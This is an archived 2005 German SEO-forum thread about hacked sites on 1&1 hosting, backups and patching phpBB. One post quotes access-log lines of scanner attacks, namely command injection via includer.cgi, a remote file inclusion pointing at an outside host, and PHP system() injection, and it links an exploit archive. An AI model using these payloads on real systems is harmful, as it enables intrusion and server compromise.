Du befindest Dich im Archiv vom ABAKUS Online Marketing Forum. Hier kannst Du Dich für das Forum mit den aktuellen Beiträgen registrieren.

1&1-Hacker unterwegs?

Hier können Sie Ihre Fragen zum Thema Suchmaschinenoptimierung (SEO) / Positionierung stellen
Pompom
PostRank 10
PostRank 10
Beiträge: 3751
Registriert: 10.09.2004, 16:38

Beitrag von Pompom » 04.08.2005, 12:17

Die Wahrscheinlichkeit, dass die Mitbewerber so nett sind, ist gering.

Die Wahrscheinlichkeit, dass Scriptkiddies sich beweisen wollen, ist sicher bedeutend größer.
Und Angriffe auf Server mit vorgefertigten Exploits stellen kein Problem mehr da.
Jeder Server wird mittlerweile pro Tag mehrfach abgescant.

Anbei ein kleines Beispiel aus dem Log:
.french-connexion.com - - [03/Aug/2005:00:45:21 +0200] "GET /includer.cgi?|echo${IFS}jSVowMsd; HTTP/1.0"
.french-connexion.com - - [03/Aug/2005:00:45:22 +0200] "GET /gallery/includer.cgi?|echo${IFS}jSVowMsd; HTTP/1.0"
.french-connexion.com - - [03/Aug/2005:00:45:22 +0200] "GET /gallery/last_gallery.php?YAPIG_PATH=https://boink.zander.ch/&cmd=echo%20jSVowMsd
.french-connexion.com - - [03/Aug/2005:00:45:22 +0200] "GET /perl/includer.cgi?|echo${IFS}jSVowMsd; HTTP/1.0"
163.92.64.reverse.layeredtech.com - - [03/Aug/2005:00:45:27 +0200] "GET /pet.php&highlight='.system(getenv(HTTP_PHP)).'

Um sich etwas über die "Werkzeuge des Bösen" zu informieren, bieten sich
die Verteilerplattformen, z.B. https://www.milw0rm.com/
an.

Anzeige von ABAKUS

von Anzeige von ABAKUS »

SEO Consulting bei ABAKUS Internet Marketing
Erfahrung seit 2002
  • persönliche Betreuung
  • individuelle Beratung
  • kompetente Umsetzung

Jetzt anfragen: 0511 / 300325-0.


OnkelHotte
PostRank 6
PostRank 6
Beiträge: 439
Registriert: 29.06.2005, 07:05

Beitrag von OnkelHotte » 04.08.2005, 15:56

Ich lass auf Root Servern nur noch ssh und httpd laufen. Mail macht ein anderer Server, der vom Provider 24/7 gehostet wird und sich in einem anderen Class-C Netz befindet.

www.wittis-web.de
PostRank 2
PostRank 2
Beiträge: 46
Registriert: 03.08.2005, 09:56

Beitrag von www.wittis-web.de » 06.08.2005, 21:11

hmm..

ich reih mich mal ein

gerade durfte ich mein backup von game-fire hochziehen ...

der hat zwar nur die index gelsöcht ... und gegen einen text getauscht,. aber egal ...
Wittis-Web - Der Webkatalog für alles und jeden
Game-Fire - Deine GamingCommunity

Burgtour
PostRank 1
PostRank 1
Beiträge: 19
Registriert: 07.08.2005, 14:55
Wohnort: Das mittelalterliche Durlach bei Karlsruhe

Beitrag von Burgtour » 07.08.2005, 16:17

Hab das Problem auch nicht, Seite läuft bestens, bis auf einige Kleinigkeiten.

Pompom
PostRank 10
PostRank 10
Beiträge: 3751
Registriert: 10.09.2004, 16:38

Beitrag von Pompom » 07.08.2005, 16:42

Burgtour,

dass du das Problem nicht hast, liegt nicht an Dir und deinem Forum, sondern daran, daß bisher kein Interessent mit dem entsprechenden Exploit auf dein Forum aufmerksam geworden ist.

mmmichael2
PostRank 3
PostRank 3
Beiträge: 75
Registriert: 18.04.2004, 16:20
Wohnort: Ahaus

Beitrag von mmmichael2 » 07.08.2005, 20:08

lomo hat geschrieben:Für angemietete ROOT-Sever, welche bei 1&1 stehen, kümmert sich 1&1 um komplette und automatisierte Server-Backups für ca. 10 EUR pro Monat. Bei virtuellem Hosting liegt die Backup-Pflicht so wie so beim Provider.
Hi,

bei "Root Servern" ist man selbst für Backups verantwortlich. Darüberhinaus gibt es IHMO keine direkten Backuppflichten für Provider, wenn dies nicht explizit vereinbart wurde.

Gruß
Michael

marc75
PostRank 9
PostRank 9
Beiträge: 1916
Registriert: 06.10.2004, 09:36

Beitrag von marc75 » 08.08.2005, 07:29

ich glaube nicht das hard_p. ein rootserver hat, sonst hätte er das mit dem register_globals kaum geschrieben.

lomo
PostRank 6
PostRank 6
Beiträge: 346
Registriert: 05.08.2004, 13:01

Beitrag von lomo » 08.08.2005, 07:53

mmmichael2 hat geschrieben:bei "Root Servern" ist man selbst für Backups verantwortlich.
Wenn ich für den sicheren Betrieb eines AKWs vearntwortlich wäre, könnte ich ich mich sicherlich auch vor die Atombrennstäbe hinsetzen und darauf blasen, um die zu kühlen, oder alternativ ein paar Leute bezahlen, die es sicher und zuverlässig machen.

Garfield
PostRank 9
PostRank 9
Beiträge: 2182
Registriert: 12.10.2004, 10:22

Beitrag von Garfield » 08.08.2005, 08:30

Burgtour hat geschrieben:Hab das Problem auch nicht, Seite läuft bestens, bis auf einige Kleinigkeiten.
Du solltest allerdings dringendst updaten auf die aktuellste phpbb-Version.

workershop
PostRank 8
PostRank 8
Beiträge: 697
Registriert: 19.11.2004, 19:08
Wohnort: Leipzig

Beitrag von workershop » 08.10.2005, 12:03

@ hard_pollux

Uns wurde am Dienstag die ganze Datenbank gelöscht. Update gerade das Forum auf die neueste Version. Der Angriff kann aber auch über irgendwelche Eingabescripte gekommen sein.

Das Lustige bei 1und1 ist das, das die Dame von der Telefonhotline mir gesagt hatte, das Sie kein Backup haben, weil das meine Sache ist. ich hatte dann nochmal an den Support per Mail geschrieben, und mich beschwert und siehe da, am Donnerstag hatte ich auf dem Server ein Backup meiner Datenbank vom Dienstag früh.


Ronny

chulian
PostRank 3
PostRank 3
Beiträge: 94
Registriert: 30.10.2004, 10:25

Beitrag von chulian » 08.10.2005, 12:26

Pompom hat geschrieben: Die Wahrscheinlichkeit, dass Scriptkiddies sich beweisen wollen, ist sicher bedeutend größer.
Und Angriffe auf Server mit vorgefertigten Exploits stellen kein Problem mehr da.
Stimmt... ist mir neulich auch mal passiert. ;)

https://haftbar.de/2005/08/11/hackbsd-c ... y0u-jank0/

man wird halt vorsichtiger...

Antworten
  • Vergleichbare Themen
    Antworten
    Zugriffe
    Letzter Beitrag